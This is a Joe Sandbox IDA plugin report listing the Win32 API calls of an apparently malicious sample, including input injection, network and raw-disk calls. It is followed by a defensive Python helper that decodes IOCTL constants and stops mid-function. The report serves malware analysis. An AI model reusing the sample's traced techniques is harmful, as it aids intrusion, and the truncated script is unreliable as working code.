                                                                                  • Instruction ID: 853556f6fcef3424686667f9512bb10c00277b1e6a0dc2aee5a05c4dc589c716
                                                                                  • Opcode Fuzzy Hash: 950061ab7faabbdeaecd51987f28e1f2bf7d6b9c3ee454d5ad31924dc131c33f
                                                                                  • Instruction Fuzzy Hash: F44154396006159FCB11AF15C449A1DBBF5BF99710F098489EA0AAB3A2CB34FC008B95
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0055B5D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: 2a17e46f6205959787299ab2f220d3c2b6b499a43ced9b33cfd349ee29d41174
                                                                                  • Instruction ID: ac00ded08d19bf2cec75f219a626593d62c5c38551c0bd56d1c90138b1f66152
                                                                                  • Opcode Fuzzy Hash: 2a17e46f6205959787299ab2f220d3c2b6b499a43ced9b33cfd349ee29d41174
                                                                                  • Instruction Fuzzy Hash: E431CF74601208AFFF289F18CCADFA87F65BB05312F644503FE11D61E1E730AA88AA55
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 0055D807
                                                                                  • GetWindowRect.USER32(?,?), ref: 0055D87D
                                                                                  • PtInRect.USER32(?,?,0055ED5A), ref: 0055D88D
                                                                                  • MessageBeep.USER32(00000000), ref: 0055D8FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1352109105-0
                                                                                  • Opcode ID: 1fef62ea88baae74839d142aebb17ac9c8d051c958cd8fdf5e493956e62089d5
                                                                                  • Instruction ID: b7da06bae7be064dcc511179df31b885015ddd5d7622a4a8fa10a8aa7084fd09
                                                                                  • Opcode Fuzzy Hash: 1fef62ea88baae74839d142aebb17ac9c8d051c958cd8fdf5e493956e62089d5
                                                                                  • Instruction Fuzzy Hash: DE41A076A00219DFCB21DF58D8A4B69BBF5FF44312F1881A6E8149F261D730E949DB60
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00533AB8
                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00533AD4
                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00533B34
                                                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00533B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 85c6163834f9f361a6f97927a6aaa51a71fef9d7cc7f850f6ff04bfd25815c27
                                                                                  • Instruction ID: dd8f3a9020721c5cf545bc0e101f4bdb4457f1b56e2eb46e4bfd0f1c0c4c2d5e
                                                                                  • Opcode Fuzzy Hash: 85c6163834f9f361a6f97927a6aaa51a71fef9d7cc7f850f6ff04bfd25815c27
                                                                                  • Instruction Fuzzy Hash: D431E530A00658AFEF218BA48829BFEBFB9BB55321F04055AE485972D1CB748F85D761
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00524038
                                                                                  • __isleadbyte_l.LIBCMT ref: 00524066
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00524094
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005240CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 038b104eb745cb3c51ddc0a9357a69336e4677b3cffcee8eae9473b00d335ac5
                                                                                  • Instruction ID: ac84d62bce894298486ef30399477f4e4490a615e4e0c8417e8b97f1aecda855
                                                                                  • Opcode Fuzzy Hash: 038b104eb745cb3c51ddc0a9357a69336e4677b3cffcee8eae9473b00d335ac5
                                                                                  • Instruction Fuzzy Hash: 3531AB30600226AFDB219F64D848AAA7FA5BF42310F158428EA658B0E0E731E8D0DB90
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 00557CB9
                                                                                    • Part of subcall function 00535F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00535F6F
                                                                                    • Part of subcall function 00535F55: GetCurrentThreadId.KERNEL32 ref: 00535F76
                                                                                    • Part of subcall function 00535F55: AttachThreadInput.USER32(00000000,?,0053781F), ref: 00535F7D
                                                                                  • GetCaretPos.USER32(?), ref: 00557CCA
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00557D03
                                                                                  • GetForegroundWindow.USER32 ref: 00557D09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2759813231-0
                                                                                  • Opcode ID: 9a3d94c6e23ca820e33d6a70ea7780c29dbaffa1c641f25a153de99bce15835e
                                                                                  • Instruction ID: 81a9a29cc8fb5f3aa1d8618efc892c56402fa7fbf77c7ab201308a5f5823d3b8
                                                                                  • Opcode Fuzzy Hash: 9a3d94c6e23ca820e33d6a70ea7780c29dbaffa1c641f25a153de99bce15835e
                                                                                  • Instruction Fuzzy Hash: 2D311E71900109AFDB00EFA5D8899EFBBF9FF98314F108466E815E3251DA319E459FA0
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • GetCursorPos.USER32(?), ref: 0055F211
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0056E4C0,?,?,?,?,?), ref: 0055F226
                                                                                  • GetCursorPos.USER32(?), ref: 0055F270
                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0056E4C0,?,?,?), ref: 0055F2A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2864067406-0
                                                                                  • Opcode ID: f70730e8b1ebc5e4cc765ef4411b543b893d3bb97e70efdf5b002b1984a0a450
                                                                                  • Instruction ID: 95495be8c89e7b52379cc4fd66af1dcdddbf5f232fadb150919871f18f4f817d
                                                                                  • Opcode Fuzzy Hash: f70730e8b1ebc5e4cc765ef4411b543b893d3bb97e70efdf5b002b1984a0a450
                                                                                  • Instruction Fuzzy Hash: E021CE7D500018AFCB158F94DC68EEE7FB5FF49311F44806AF9094B2A1D3309994EBA0
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00544358
                                                                                    • Part of subcall function 005443E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00544401
                                                                                    • Part of subcall function 005443E2: InternetCloseHandle.WININET(00000000), ref: 0054449E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1463438336-0
                                                                                  • Opcode ID: a758869a021a4a1edb8b2c2a67af44b851e4042e13c25f098d809f4ae47ea68a
                                                                                  • Instruction ID: 328b988472099dff3e49d08157be3b5676e2c4549fa4ec23f8b4806f856b7616
                                                                                  • Opcode Fuzzy Hash: a758869a021a4a1edb8b2c2a67af44b851e4042e13c25f098d809f4ae47ea68a
                                                                                  • Instruction Fuzzy Hash: 68210432240605BBDB159F609C04FFBBBB9FF84B08F10481ABA0586550D77198A4ABA0
                                                                                  APIs
                                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00548AE0
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00548AF2
                                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00548AFF
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548B16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastacceptselect
                                                                                  • String ID:
                                                                                  • API String ID: 385091864-0
                                                                                  • Opcode ID: f324366d9ed7658073a3bfcf998c5502f3ebb9d8b5039a44b4054b785aec72cb
                                                                                  • Instruction ID: deb8e2c569041f4860a2c844d7c051d5d4f1138c779d8009451f17ef73101e4e
                                                                                  • Opcode Fuzzy Hash: f324366d9ed7658073a3bfcf998c5502f3ebb9d8b5039a44b4054b785aec72cb
                                                                                  • Instruction Fuzzy Hash: 0221A771A001245FC7149F68D885A9E7FFCFF59350F00416AF849D7290DB7499458FA0
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00558AA6
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00558AC0
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00558ACE
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00558ADC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                  • String ID:
                                                                                  • API String ID: 2169480361-0
                                                                                  • Opcode ID: 330e3bf94f67f3413d8ce925d3f58c26a1a0fb45b55d413b352b1c98260e11ab
                                                                                  • Instruction ID: 730f94098e4ac37e58509e01b2c8e343f1c5bcf88a5a32b2ffe1eea5c82a0267
                                                                                  • Opcode Fuzzy Hash: 330e3bf94f67f3413d8ce925d3f58c26a1a0fb45b55d413b352b1c98260e11ab
                                                                                  • Instruction Fuzzy Hash: 9411D331205115AFDB04AB14DC19FBE7BA9BF85321F18411BF91AD72E1CBB4AC449B94
                                                                                  APIs
                                                                                    • Part of subcall function 00531E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00530ABB,?,?,?,0053187A,00000000,000000EF,00000119,?,?), ref: 00531E77
                                                                                    • Part of subcall function 00531E68: lstrcpyW.KERNEL32(00000000,?,?,00530ABB,?,?,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00531E9D
                                                                                    • Part of subcall function 00531E68: lstrcmpiW.KERNEL32(00000000,?,00530ABB,?,?,?,0053187A,00000000,000000EF,00000119,?,?), ref: 00531ECE
                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00530AD4
                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00530AFA
                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00530B2E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                  • String ID: cdecl
                                                                                  • API String ID: 4031866154-3896280584
                                                                                  • Opcode ID: 99987c3daaafa6d793d23af02e303c45feb27325dd2009f9c1c72413289269f4
                                                                                  • Instruction ID: 5656e0cc8ae6014f3e4c7faa020769921e1979bfd6acf965821d0766852c5c12
                                                                                  • Opcode Fuzzy Hash: 99987c3daaafa6d793d23af02e303c45feb27325dd2009f9c1c72413289269f4
                                                                                  • Instruction Fuzzy Hash: 52119336200305AFDB25AF34DC65D7EBBB8FF85354F80506AE80ACB290EB719950D7A0
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00522FB5
                                                                                    • Part of subcall function 0051395C: __FF_MSGBANNER.LIBCMT ref: 00513973
                                                                                    • Part of subcall function 0051395C: __NMSG_WRITE.LIBCMT ref: 0051397A
                                                                                    • Part of subcall function 0051395C: RtlAllocateHeap.NTDLL(015B0000,00000000,00000001,00000001,00000000,?,?,0050F507,?,0000000E), ref: 0051399F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  • Opcode ID: c47d9dfc3e0b72d173e5c08d87fa47e1b7fd315071ab2732d616d2a6fab2ea1b
                                                                                  • Instruction ID: 81abf129ddaf9d3709bd81430c56d72546338595d13bedf51ce615417280a1fd
                                                                                  • Opcode Fuzzy Hash: c47d9dfc3e0b72d173e5c08d87fa47e1b7fd315071ab2732d616d2a6fab2ea1b
                                                                                  • Instruction Fuzzy Hash: 3411EB32408637ABEB213B74BC0D69A3FB4BF99364F204915F9099A1D1DB74CD809AE0
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 005305AC
                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005305C7
                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005305DD
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00530632
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                  • String ID:
                                                                                  • API String ID: 3137044355-0
                                                                                  • Opcode ID: d5f3d6e22510dfaf50542049fa86c2c89e9e79a7c37f0af1c9f308e2be58f8dd
                                                                                  • Instruction ID: 98999f71c8acda29adf30f8484cef3c097d9edc562ee1c7162e01f3258d70ccd
                                                                                  • Opcode Fuzzy Hash: d5f3d6e22510dfaf50542049fa86c2c89e9e79a7c37f0af1c9f308e2be58f8dd
                                                                                  • Instruction Fuzzy Hash: ED218771900309EFDB208F91DC99ADABFBCFF80700F009869E51692190D770EA55EF60
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00536733
                                                                                  • _memset.LIBCMT ref: 00536754
                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005367A6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 005367AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1157408455-0
                                                                                  • Opcode ID: 2a440e8eb1fee4d413d6782c29d868c0af705d8980861753972c68b499e35ea9
                                                                                  • Instruction ID: e64d262e260ff2868cded07fbc076f7ff6030a3c249f1ed22c426f7f6507806d
                                                                                  • Opcode Fuzzy Hash: 2a440e8eb1fee4d413d6782c29d868c0af705d8980861753972c68b499e35ea9
                                                                                  • Instruction Fuzzy Hash: 101106769012287AE7209BA5AC4DFEBBBBCEF44724F10419AF508E71D0D2704E84CBB4
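The CreateFileW / DeviceIoControl pair in the record above is printed with raw hex arguments, which is how Joe Sandbox records every call. The Python helper below is an added example and is not part of the report, of the sample, or of the AutoIt runtime it was built with: it parses API lines in the report's own "Api.MODULE(args), ref: ADDR" format and resolves the constants against their Windows SDK names (winnt.h for the CreateFileW parameters, winioctl.h and ntddscsi.h for the control code). The lookup tables are deliberately partial and limited to the controller and disk pass-through codes that matter in triage; the four sample lines are copied from the record above. The device path is recorded as `?`, so the helper does not claim which device was opened, and the report does not show the ATA command placed in the buffer, so the intent of the call is left open.

```python
# Added example (not from the Joe Sandbox report or the sample): resolve the
# raw hex arguments Joe Sandbox prints for CreateFileW / DeviceIoControl.
# Constant names and values are taken from the Windows SDK headers
# (winnt.h, winioctl.h, ntddscsi.h); the tables are deliberately partial.
import re

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
DEVICE_TYPES = {
    0x04: "FILE_DEVICE_CONTROLLER (IOCTL_SCSI_BASE)",
    0x07: "FILE_DEVICE_DISK",
    0x2D: "FILE_DEVICE_MASS_STORAGE (IOCTL_STORAGE_BASE)",
}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}

# Control codes that address the disk controller directly (ntddscsi.h /
# winioctl.h). Any of these in a trace means the process talks to the
# physical drive, not to a file system volume.
KNOWN_IOCTLS = {
    0x0004D004: "IOCTL_SCSI_PASS_THROUGH",
    0x0004D008: "IOCTL_SCSI_MINIPORT",
    0x0004D014: "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    0x0004D028: "IOCTL_IDE_PASS_THROUGH",
    0x0004D02C: "IOCTL_ATA_PASS_THROUGH",
    0x0004D030: "IOCTL_ATA_PASS_THROUGH_DIRECT",
    0x0007C088: "SMART_RCV_DRIVE_DATA",
    0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY",
}

CREATEFILE_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                     (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE_MODES = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"),
               (0x4, "FILE_SHARE_DELETE")]
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = [(0x00000080, "FILE_ATTRIBUTE_NORMAL"),
              (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
              (0x40000000, "FILE_FLAG_OVERLAPPED")]

# Matches the report's "Api.MODULE(arg,arg,...), ref: ADDR" lines; "?" marks
# an argument the sandbox could not resolve.
API_LINE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def _bits(value, table):
    """Name the flag bits set in value; leave unknown bits as a hex remainder."""
    names = [name for bit, name in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table)
    if rest:
        names.append(f"0x{rest:X}")
    return names or ["0"]


def decode_ioctl(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    device, access = (code >> 16) & 0xFFFF, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    return {
        "code": f"0x{code:08X}",
        "name": KNOWN_IOCTLS.get(code, "unknown"),
        "device_type": DEVICE_TYPES.get(device, f"0x{device:X}"),
        "function": function,
        "method": METHODS[method],
        "access": ACCESS[access],
    }


def decode_createfile(access, share, disposition, flags):
    """Name dwDesiredAccess, dwShareMode, dwCreationDisposition and dwFlagsAndAttributes."""
    return {
        "access": _bits(access, CREATEFILE_ACCESS),
        "share": _bits(share, SHARE_MODES),
        "disposition": DISPOSITIONS.get(disposition, f"0x{disposition:X}"),
        "flags": _bits(flags, FILE_FLAGS),
    }


def parse_api_line(line):
    """Parse one report line into api, module, argument list and call site."""
    m = API_LINE.search(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [None if a.strip() == "?" else int(a, 16)
            for a in raw_args.split(",") if a.strip()]
    return {"api": api, "module": module, "args": args, "ref": ref}


def triage(lines):
    """One readable finding per decodable CreateFileW / DeviceIoControl call."""
    findings = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        a = call["args"]
        if call["api"] == "CreateFileW" and len(a) >= 6:
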